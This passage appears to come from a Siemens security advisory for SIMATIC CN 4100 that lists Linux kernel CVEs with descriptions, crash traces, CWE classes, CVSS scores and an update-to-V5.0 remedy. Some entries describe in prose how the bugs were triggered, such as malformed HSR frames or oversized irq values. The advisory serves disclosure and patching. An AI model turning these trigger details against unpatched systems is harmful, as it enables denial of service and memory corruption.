zeroed before handling each instruction. Thanks to Arnaud Lecomte for their fix to `do_insn_ioctl()`. That fix replaced the call to `kmalloc_array()` with `kcalloc()`, but it is not always necessary to clear the whole buffer. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39685 In the Linux kernel, the following vulnerability has been resolved: comedi: pcl726: Prevent invalid irq number The reproducer passed in an irq number(0x80008000) that was too large, which triggered the oob. Added an interrupt number check to prevent users from passing in an irq number that was too large. If `it->options[1]` is 31, then `1 << it->options[1]` is still invalid because it shifts a 1-bit into the sign bit (which is UB in C). Possible solutions include reducing the upper bound on the `it->options[1]` value to 30 or lower, or using `1U << it->options[1]`. The old code would just not attempt to request the IRQ if the `options[1]` value were invalid. And it would still configure the device without interrupts even if the call to `request_irq` returned an error. So it would be better to combine this test with the test below. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39686 In the Linux kernel, the following vulnerability has been resolved: comedi: Make insn_rw_emulate_bits() do insn->n samples The `insn_rw_emulate_bits()` function is used as a default handler for `INSN_READ` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_READ`. Similarly, it is used as a default handler for `INSN_WRITE` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_WRITE`. It works by emulating the `INSN_READ` or `INSN_WRITE` instruction handling with a constructed `INSN_BITS` instruction. However, `INSN_READ` and `INSN_WRITE` instructions are supposed to be able read or write multiple samples, indicated by the `insn->n` value, but `insn_rw_emulate_bits()` currently only handles a single sample. For `INSN_READ`, the comedi core will copy `insn->n` samples back to user-space. (That triggered KASAN kernel-infoleak errors when `insn->n` was greater than 1, but that is being fixed more generally elsewhere in the comedi core.) Make `insn_rw_emulate_bits()` either handle `insn->n` samples, or return an error, to conform to the general expectation for `INSN_READ` and `INSN_WRITE` handlers. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39687 In the Linux kernel, the following vulnerability has been resolved: iio: light: as73211: Ensure buffer holes are zeroed Given that the buffer is copied to a kfifo that ultimately user space can read, ensure we zero it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39689 In the Linux kernel, the following vulnerability has been resolved: ftrace: Also allocate and copy hash for reading of filter files Currently the reader of set_ftrace_filter and set_ftrace_notrace just adds the pointer to the global tracer hash to its iterator. Unlike the writer that allocates a copy of the hash, the reader keeps the pointer to the filter hashes. This is problematic because this pointer is static across function calls that release the locks that can update the global tracer hashes. This can cause UAF and similar bugs. Allocate and copy the hash for reading the filter files like it is done for the writers. This not only fixes UAF bugs, but also makes the code a bit simpler as it doesn't have to differentiate when to free the iterator's hash between writers and readers. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39691 In the Linux kernel, the following vulnerability has been resolved: fs/buffer: fix use-after-free when call bh_read() helper There's issue as follows: BUG: KASAN: stack-out-of-bounds in end_buffer_read_sync+0xe3/0x110 Read of size 8 at addr ffffc9000168f7f8 by task swapper/3/0 CPU: 3 UID: 0 PID: 0 Comm: swapper/3 Not tainted 6.16.0-862.14.0.6.x86_64 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) Call Trace: dump_stack_lvl+0x55/0x70 print_address_description.constprop.0+0x2c/0x390 print_report+0xb4/0x270 kasan_report+0xb8/0xf0 end_buffer_read_sync+0xe3/0x110 end_bio_bh_io_sync+0x56/0x80 blk_update_request+0x30a/0x720 scsi_end_request+0x51/0x2b0 scsi_io_completion+0xe3/0x480 ? scsi_device_unbusy+0x11e/0x160 blk_complete_reqs+0x7b/0x90 handle_softirqs+0xef/0x370 irq_exit_rcu+0xa5/0xd0 sysvec_apic_timer_interrupt+0x6e/0x90 Above issue happens when do ntfs3 filesystem mount, issue may happens as follows: mount IRQ ntfs_fill_super read_cache_page do_read_cache_folio filemap_read_folio mpage_read_folio do_mpage_readpage ntfs_get_block_vbo bh_read submit_bh wait_on_buffer(bh); blk_complete_reqs scsi_io_completion scsi_end_request blk_update_request end_bio_bh_io_sync end_buffer_read_sync __end_buffer_read_notouch unlock_buffer wait_on_buffer(bh);--> return will return to caller put_bh --> trigger stack-out-of-bounds In the mpage_read_folio() function, the stack variable 'map_bh' is passed to ntfs_get_block_vbo(). Once unlock_buffer() unlocks and wait_on_buffer() returns to continue processing, the stack variable is likely to be reclaimed. Consequently, during the end_buffer_read_sync() process, calling put_bh() may result in stack overrun. If the bh is not allocated on the stack, it belongs to a folio. Freeing a buffer head which belongs to a folio is done by drop_buffers() which will fail to free buffers which are still locked. So it is safe to call put_bh() before __end_buffer_read_notouch(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H CVE-2025-39692 In the Linux kernel, the following vulnerability has been resolved: smb: server: split ksmbd_rdma_stop_listening() out of ksmbd_rdma_destroy() We can't call destroy_workqueue(smb_direct_wq); before stop_sessions()! Otherwise already existing connections try to use smb_direct_wq as a NULL pointer. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39693 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Avoid a NULL pointer dereference [WHY] Although unlikely drm_atomic_get_new_connector_state() or drm_atomic_get_old_connector_state() can return NULL. [HOW] Check returns before dereference. (cherry picked from commit 1e5e8d672fec9f2ab352be121be971877bff2af9) View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39694 In the Linux kernel, the following vulnerability has been resolved: s390/sclp: Fix SCCB present check Tracing code called by the SCLP interrupt handler contains early exits if the SCCB address associated with an interrupt is NULL. This check is performed after physical to virtual address translation. If the kernel identity mapping does not start at address zero, the resulting virtual address is never zero, so that the NULL checks won't work. Subsequently this may result in incorrect accesses to the first page of the identity mapping. Fix this by introducing a function that handles the NULL case before address translation. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39697 In the Linux kernel, the following vulnerability has been resolved: NFS: Fix a race when updating an existing write After nfs_lock_and_join_requests() tests for whether the request is still attached to the mapping, nothing prevents a call to nfs_inode_remove_request() from succeeding until we actually lock the page group. The reason is that whoever called nfs_inode_remove_request() doesn't necessarily have a lock on the page group head. So in order to avoid races, let's take the page group lock earlier in nfs_lock_and_join_requests(), and hold it across the removal of the request in nfs_inode_remove_request(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39701 In the Linux kernel, the following vulnerability has been resolved: ACPI: pfr_update: Fix the driver update version check The security-version-number check should be used rather than the runtime version check for driver updates. Otherwise, the firmware update would fail when the update binary had a lower runtime version number than the current one. [ rjw: Changelog edits ] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-1025 Comparison Using Wrong Factors Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39702 In the Linux kernel, the following vulnerability has been resolved: ipv6: sr: Fix MAC comparison to be constant-time To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-208 Observable Timing Discrepancy Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39703 In the Linux kernel, the following vulnerability has been resolved: net, hsr: reject HSR frame if skb can't hold tag Receiving HSR frame with insufficient space to hold HSR tag in the skb can result in a crash (kernel BUG): [ 45.390915] skbuff: skb_under_panic: text:ffffffff86f32cac len:26 put:14 head:ffff888042418000 data:ffff888042417ff4 tail:0xe end:0x180 dev:bridge_slave_1 [ 45.392559] ------------[ cut here ]------------ [ 45.392912] kernel BUG at net/core/skbuff.c:211! [ 45.393276] Oops: invalid opcode: 0000 [#1] SMP DEBUG_PAGEALLOC KASAN NOPTI [ 45.393809] CPU: 1 UID: 0 PID: 2496 Comm: reproducer Not tainted 6.15.0 #12 PREEMPT(undef) [ 45.394433] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 45.395273] RIP: 0010:skb_panic+0x15b/0x1d0 [ 45.402911] Call Trace: [ 45.403105] [ 45.404470] skb_push+0xcd/0xf0 [ 45.404726] br_dev_queue_push_xmit+0x7c/0x6c0 [ 45.406513] br_forward_finish+0x128/0x260 [ 45.408483] __br_forward+0x42d/0x590 [ 45.409464] maybe_deliver+0x2eb/0x420 [ 45.409763] br_flood+0x174/0x4a0 [ 45.410030] br_handle_frame_finish+0xc7c/0x1bc0 [ 45.411618] br_handle_frame+0xac3/0x1230 [ 45.413674] __netif_receive_skb_core.constprop.0+0x808/0x3df0 [ 45.422966] __netif_receive_skb_one_core+0xb4/0x1f0 [ 45.424478] __netif_receive_skb+0x22/0x170 [ 45.424806] process_backlog+0x242/0x6d0 [ 45.425116] __napi_poll+0xbb/0x630 [ 45.425394] net_rx_action+0x4d1/0xcc0 [ 45.427613] handle_softirqs+0x1a4/0x580 [ 45.427926] do_softirq+0x74/0x90 [ 45.428196] This issue was found by syzkaller. The panic happens in br_dev_queue_push_xmit() once it receives a corrupted skb with ETH header already pushed in linear data. When it attempts the skb_push() call, there's not enough headroom and skb_push() panics. The corrupted skb is put on the queue by HSR layer, which makes a sequence of unintended transformations when it receives a specific corrupted HSR frame (with incomplete TAG). Fix it by dropping and consuming frames that are not long enough to contain both ethernet and hsr headers. Alternative fix would be to check for enough headroom before skb_push() in br_dev_queue_push_xmit(). In the reproducer, this is injected via AF_PACKET, but I don't easily see why it couldn't be sent over the wire from adjacent network. Further Details: In the reproducer, the following network interface chain is set up: ┌────────────────┐ ┌────────────────┐ │ veth0_to_hsr ├───┤ hsr_slave0 ┼───┐ └────────────────┘ └────────────────┘ │ │ ┌──────┐ ├─┤ hsr0 ├───┐ │ └──────┘ │ ┌────────────────┐ ┌────────────────┐ │ │┌────────┐ │ veth1_to_hsr ┼───┤ hsr_slave1 ├───┘ └┤ │ └────────────────┘ └────────────────┘ ┌┼ bridge │ ││ │ │└────────┘ │ ┌───────┐ │ │ ... ├──────┘ └───────┘ To trigger the events leading up to crash, reproducer sends a corrupted HSR fr ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-1286 Improper Validation of Syntactic Correctness of Input Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39706 In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Destroy KFD debugfs after destroy KFD wq Since KFD proc content was moved to kernel debugfs, we can't destroy KFD debugfs before kfd_process_destroy_wq. Move kfd_process_destroy_wq prior to kfd_debugfs_fini to fix a kernel NULL pointer problem. It happens when /sys/kernel/debug/kfd was already destroyed in kfd_debugfs_fini but kfd_process_destroy_wq calls kfd_debugfs_remove_process. This line debugfs_remove_recursive(entry->proc_dentry); tries to remove /sys/kernel/debug/kfd/proc/ while /sys/kernel/debug/kfd is already gone. It hangs the kernel by kernel NULL pointer. (cherry picked from commit 0333052d90683d88531558dcfdbf2525cc37c233) View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39709 In the Linux kernel, the following vulnerability has been resolved: media: venus: protect against spurious interrupts during probe Make sure the interrupt handler is initialized before the interrupt is registered. If the IRQ is registered before hfi_create(), it's possible that an interrupt fires before the handler setup is complete, leading to a NULL dereference. This error condition has been observed during system boot on Rb3Gen2. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39710 In the Linux kernel, the following vulnerability has been resolved: media: venus: Add a check for packet size after reading from shared memory Add a check to ensure that the packet size does not exceed the number of available words after reading the packet header from shared memory. This ensures that the size provided by the firmware is safe to process and prevent potential out-of-bounds memory access. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39713 In the Linux kernel, the following vulnerability has been resolved: media: rainshadow-cec: fix TOCTOU race condition in rain_interrupt() In the interrupt handler rain_interrupt(), the buffer full check on rain->buf_len is performed before acquiring rain->buf_lock. This creates a Time-of-Check to Time-of-Use (TOCTOU) race condition, as rain->buf_len is concurrently accessed and modified in the work handler rain_irq_work_handler() under the same lock. Multiple interrupt invocations can race, with each reading buf_len before it becomes full and then proceeding. This can lead to both interrupts attempting to write to the buffer, incrementing buf_len beyond its capacity (DATA_SIZE) and causing a buffer overflow. Fix this bug by moving the spin_lock() to before the buffer full check. This ensures that the check and the subsequent buffer modification are performed atomically, preventing the race condition. An corresponding spin_unlock() is added to the overflow path to correctly release the lock. This possible bug was found by an experimental static analysis tool developed by our team. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39714 In the Linux kernel, the following vulnerability has been resolved: media: usbtv: Lock resolution while streaming When an program is streaming (ffplay) and another program (qv4l2) changes the TV standard from NTSC to PAL, the kernel crashes due to trying to copy to unmapped memory. Changing from NTSC to PAL increases the resolution in the usbtv struct, but the video plane buffer isn't adjusted, so it overflows. [hverkuil: call vb2_is_busy instead of vb2_is_streaming] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39715 In the Linux kernel, the following vulnerability has been resolved: parisc: Revise gateway LWS calls to probe user read access We use load and stbys,e instructions to trigger memory reference interruptions without writing to memory. Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel and gateway page execute at privilege level 0, so this code never triggers a read access interruption. Thus, it is currently possible for user code to execute a LWS compare and swap operation at an address that is read protected at privilege level 3 (PRIV_USER). Fix this by probing read access rights at privilege level 3 and branching to lws_fault if access isn't allowed. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39716 In the Linux kernel, the following vulnerability has been resolved: parisc: Revise __get_user() to probe user read access Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel executes at privilege level 0, so __get_user() never triggers a read access interruption (code 26). Thus, it is currently possible for user code to access a read protected address via a system call. Fix this by probing read access rights at privilege level 3 (PRIV_USER) and setting __gu_err to -EFAULT (-14) if access isn't allowed. Note the cmpiclr instruction does a 32-bit compare because COND macro doesn't work inside asm. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39718 In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: Validate length in packet header before skb_put() When receiving a vsock packet in the guest, only the virtqueue buffer size is validated prior to virtio_vsock_skb_rx_put(). Unfortunately, virtio_vsock_skb_rx_put() uses the length from the packet header as the length argument to skb_put(), potentially resulting in SKB overflow if the host has gone wonky. Validate the length as advertised by the packet header before calling virtio_vsock_skb_rx_put(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.6 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2025-39719 In the Linux kernel, the following vulnerability has been resolved: iio: imu: bno055: fix OOB access of hw_xlate array Fix a potential out-of-bounds array access of the hw_xlate array in bno055.c. In bno055_get_regmask(), hw_xlate was iterated over the length of the vals array instead of the length of the hw_xlate array. In the case of bno055_gyr_scale, the vals array is larger than the hw_xlate array, so this could result in an out-of-bounds access. In practice, this shouldn't happen though because a match should always be found which breaks out of the for loop before it iterates beyond the end of the hw_xlate array. By adding a new hw_xlate_len field to the bno055_sysfs_attr, we can be sure we are iterating over the correct length. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39724 In the Linux kernel, the following vulnerability has been resolved: serial: 8250: fix panic due to PSLVERR When the PSLVERR_RESP_EN parameter is set to 1, the device generates an error response if an attempt is made to read an empty RBR (Receive Buffer Register) while the FIFO is enabled. In serial8250_do_startup(), calling serial_port_out(port, UART_LCR, UART_LCR_WLEN8) triggers dw8250_check_lcr(), which invokes dw8250_force_idle() and serial8250_clear_and_reinit_fifos(). The latter function enables the FIFO via serial_out(p, UART_FCR, p->fcr). Execution proceeds to the serial_port_in(port, UART_RX). This satisfies the PSLVERR trigger condition. When another CPU (e.g., using printk()) is accessing the UART (UART is busy), the current CPU fails the check (value & ~UART_LCR_SPAR) == (lcr & ~UART_LCR_SPAR) in dw8250_check_lcr(), causing it to enter dw8250_force_idle(). Put serial_port_out(port, UART_LCR, UART_LCR_WLEN8) under the port->lock to fix this issue. Panic backtrace: [ 0.442336] Oops - unknown exception [#1] [ 0.442343] epc : dw8250_serial_in32+0x1e/0x4a [ 0.442351] ra : serial8250_do_startup+0x2c8/0x88e ... [ 0.442416] console_on_rootfs+0x26/0x70 View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39736 In the Linux kernel, the following vulnerability has been resolved: mm/kmemleak: avoid deadlock by moving pr_warn() outside kmemleak_lock When netpoll is enabled, calling pr_warn_once() while holding kmemleak_lock in mem_pool_alloc() can cause a deadlock due to lock inversion with the netconsole subsystem. This occurs because pr_warn_once() may trigger netpoll, which eventually leads to __alloc_skb() and back into kmemleak code, attempting to reacquire kmemleak_lock. This is the path for the deadlock. mem_pool_alloc() -> raw_spin_lock_irqsave(&kmemleak_lock, flags); -> pr_warn_once() -> netconsole subsystem -> netpoll -> __alloc_skb -> __create_object -> raw_spin_lock_irqsave(&kmemleak_lock, flags); Fix this by setting a flag and issuing the pr_warn_once() after kmemleak_lock is released. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-833 Deadlock Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39737 In the Linux kernel, the following vulnerability has been resolved: mm/kmemleak: avoid soft lockup in __kmemleak_do_cleanup() A soft lockup warning was observed on a relative small system x86-64 system with 16 GB of memory when running a debug kernel with kmemleak enabled. watchdog: BUG: soft lockup - CPU#8 stuck for 33s! [kworker/8:1:134] The test system was running a workload with hot unplug happening in parallel. Then kemleak decided to disable itself due to its inability to allocate more kmemleak objects. The debug kernel has its CONFIG_DEBUG_KMEMLEAK_MEM_POOL_SIZE set to 40,000. The soft lockup happened in kmemleak_do_cleanup() when the existing kmemleak objects were being removed and deleted one-by-one in a loop via a workqueue. In this particular case, there are at least 40,000 objects that need to be processed and given the slowness of a debug kernel and the fact that a raw_spinlock has to be acquired and released in __delete_object(), it could take a while to properly handle all these objects. As kmemleak has been disabled in this case, the object removal and deletion process can be further optimized as locking isn't really needed. However, it is probably not worth the effort to optimize for such an edge case that should rarely happen. So the simple solution is to call cond_resched() at periodic interval in the iteration loop to avoid soft lockup. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39738 In the Linux kernel, the following vulnerability has been resolved: btrfs: do not allow relocation of partially dropped subvolumes [BUG] There is an internal report that balance triggered transaction abort, with the following call trace: item 85 key (594509824 169 0) itemoff 12599 itemsize 33 extent refs 1 gen 197740 flags 2 ref#0: tree block backref root 7 item 86 key (594558976 169 0) itemoff 12566 itemsize 33 extent refs 1 gen 197522 flags 2 ref#0: tree block backref root 7 ... BTRFS error (device loop0): extent item not found for insert, bytenr 594526208 num_bytes 16384 parent 449921024 root_objectid 934 owner 1 offset 0 BTRFS error (device loop0): failed to run delayed ref for logical 594526208 num_bytes 16384 type 182 action 1 ref_mod 1: -117 ------------[ cut here ]------------ BTRFS: Transaction aborted (error -117) WARNING: CPU: 1 PID: 6963 at ../fs/btrfs/extent-tree.c:2168 btrfs_run_delayed_refs+0xfa/0x110 [btrfs] And btrfs check doesn't report anything wrong related to the extent tree. [CAUSE] The cause is a little complex, firstly the extent tree indeed doesn't have the backref for 594526208. The extent tree only have the following two backrefs around that bytenr on-disk: item 65 key (594509824 METADATA_ITEM 0) itemoff 13880 itemsize 33 refs 1 gen 197740 flags TREE_BLOCK tree block skinny level 0 (176 0x7) tree block backref root CSUM_TREE item 66 key (594558976 METADATA_ITEM 0) itemoff 13847 itemsize 33 refs 1 gen 197522 flags TREE_BLOCK tree block skinny level 0 (176 0x7) tree block backref root CSUM_TREE But the such missing backref item is not an corruption on disk, as the offending delayed ref belongs to subvolume 934, and that subvolume is being dropped: item 0 key (934 ROOT_ITEM 198229) itemoff 15844 itemsize 439 generation 198229 root_dirid 256 bytenr 10741039104 byte_limit 0 bytes_used 345571328 last_snapshot 198229 flags 0x1000000000001(RDONLY) refs 0 drop_progress key (206324 EXTENT_DATA 2711650304) drop_level 2 level 2 generation_v2 198229 And that offending tree block 594526208 is inside the dropped range of that subvolume. That explains why there is no backref item for that bytenr and why btrfs check is not reporting anything wrong. But this also shows another problem, as btrfs will do all the orphan subvolume cleanup at a read-write mount. So half-dropped subvolume should not exist after an RW mount, and balance itself is also exclusive to subvolume cleanup, meaning we shouldn't hit a subvolume half-dropped during relocation. The root cause is, there is no orphan item for this subvolume. In fact there are 5 subvolumes from around 2021 that have the same problem. It looks like the original report has some older kernels running, and caused those zombie subvolumes. Thankfully upstream commit 8d488a8c7ba2 ("btrfs: fix subvolume/snapshot deletion not triggered on mount") has long fixed the bug. [ENHANCEMENT] For repairing such old fs, btrfs-progs will be enhanced. Considering how delayed the problem will show up (at run delayed ref time) and at that time we have to abort transaction already, it is too late. Instead here we reject any half-dropped subvolume for reloc tree at the earliest time, preventing confusion and extra time wasted on debugging similar bugs. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39742 In the Linux kernel, the following vulnerability has been resolved: RDMA: hfi1: fix possible divide-by-zero in 